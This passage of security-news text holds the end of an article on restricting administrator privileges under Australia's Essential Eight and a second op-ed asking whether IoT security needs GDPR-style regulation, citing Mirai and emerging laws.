Removing this privilege from users who do not need it can bolster network security by eliminating this potential vulnerability. It can also create a more stable network environment, making problems easier to identify and fix, since only a limited number of users will be able to circumvent security settings and make changes to the system. 

Restricting admin privileges can be done by:

  1. Identifying which tasks require admin privileges.
  2. Authorising users for whom admin privileges are necessary.
  3. Creating separate accounts for those users who need admin privileges, whilst ensuring that they only have the admin privileges necessary for their roles.
  4. Regularly reviewing which accounts have access to admin privileges, updating and removing users and privileges when appropriate.

To further improve the effectiveness of removing admin privileges, those who have access to these accounts should be prevented from accessing programs which could pose a potential cyber security risk, such as web browsers or email applications. Separate accounts should always be created for these tasks. 

By following the guidance laid out in Australia’s Essential Eight, and by focusing particularly on application whitelisting and admin right restrictions, global organisations can better mitigate the risk and impact of cyber attacks. 

About the author: Kevin Alexandra is principal technical consultant in Avecto’s Boston office, where he acts as senior escalation engineer for all Avecto Defendpoint deals in North America. Kevin is also a technical account manager providing dedicated one-to-one support to a multi-national consumer goods corporation operating Avecto’s solution.

Copyright 2010 Respective Author at Infosec Island

Will We Get a GDPR for the IoT?

The General Data Protection Regulation (GDPR) breaks new ground when it comes to privacy law. After years of hidden breaches, stolen identities and negligent data handling,organizationswill finally be forced to get serious about data privacy.

Data loss incidents that are due to non-compliance will face fines that run as high as four percent of global turnover, or 20 million euros, whichever is higher. This will prove a threat to some, but for others, it will finally put the weight behind personal data protection that has been lacking for so long.

But there is still no specific regulation for the relentlessly growing, and fatally insecure IoT. In 2017, the European Union Agency for Network and Information Security (ENISA) found that there were no “legal guidelines for IoT device and service trust.” Nor any “level zero defined for the security and privacy of connected and smart devices.”

Today’s smart workforce are bringing in personal devices into their workplace with the endeavor to get their job done faster. Manufacturers are building connected intelligence in their products to make them stickier and more purposeful. This massive small business and consumer adoption of connected devices have unfortunately left most manufacturers in the front seat offering features and interoperability, but with security exposures buried in the trunk.

IoT is a market that doesn’t show any signs of slowing down. The IDC predicts that there will be 200 billion connected devices by 2020 and if standards stay the same that could mean billions of security vulnerabilities. The Marai virus demonstrated how IoT devices with default settings can be vulnerable to infection and this malware has been used in DDOS attacks. And there are more malicious variants underway such as those that now aim to target ARC processors embedded into a broad array of Linux-based devices.

As such, it might then be a good idea to imbue IoT security with the kind of weight that the GDPR gives personal data. But why hasn’t that happened yet?

While GDPR does not have much that directly confronts the problems of the IoT. It regulates the use of personal data, as it pertains to the IoT but, the GDPR still doesn’t call the problem by its name. For example, GDPR holds you accountable for your security vulnerabilities, third parties and personal data handling assets to make sure that they are also GDPR compliant. This includes IoT devices, but those specific concerns will be diluted among a mix of other security considerations.

Regulation is often slow. The last piece of EU data protection regulation came in 1995. Since then we’ve seen the massive exponential growth of cross border data flows, the inexorable rise of cybercrime and the appearance of multiple computing devices and high speed internet connections in European homes. The GDPR, for example, was first proposed in January 2012 and it took over four years before it was adopted by the European parliament.

The point here is that regulation can be slow to deal with change. First, lawmakers have to get wind of a problem, begin to understand it and then meticulously draft lengthy documents embattled by bureaucratic hurdles, legal considerations and competing interests.

The GDPR holds supranational legitimacy over 28 separate countries and applies not only to bodies which are based in those countries but have customers within them. Considering the EU is still the world’s largest market, this makes the GDPR not just European regulation but a global one. Unless national regulators can make foreign manufacturers do what they say, regulation on IoT security will be hard to achieve. This could be especially difficult as international supply chains will prove a problem, as many IoT devices are manufactured in countries prized for their low regulatory barriers – allowing retailers to bring in the cheap smart devices that consumers and small business crave.

There are some signs toward IoT security regulation. In April 2017, the Californian state government introduced legislation for IoT security and the French government are eyeing proposals to make IoT manufacturers liable for the security of their products. There is a great desire to install regulations of this kind among a number of sectors, public and private.

Until then, it behooves the industry to establish a commercial IoT security testing standard and share best practices for IoT risk mitigation. For example, ISCA Labs, an ISO-accredited, independent, third-party tester has published an IoT testing framework. For example, enterprises have leveraged network access control (NAC) technology to fortify IoTdefences, enforce policies for unsanctioned IoT device use, and mitigate risk of malware proliferation, network exposure, and sensitive data leakage. Means to educate the consumer and enterprise market on IoT security threats and safeguards is equally important.

About the author: Scott Gordon is the chief marketing officer at Pulse Secure, responsible for global marketing strategy, communications, operations, channel and sales enablement. He possesses over 20 years’ experience contributing to security management, network, endpoint and data security, and risk assessment technologies at innovative startups and large organizations across SaaS, hardware and enterprise software platforms.

Copyright 2010 Respective Author at Infosec Island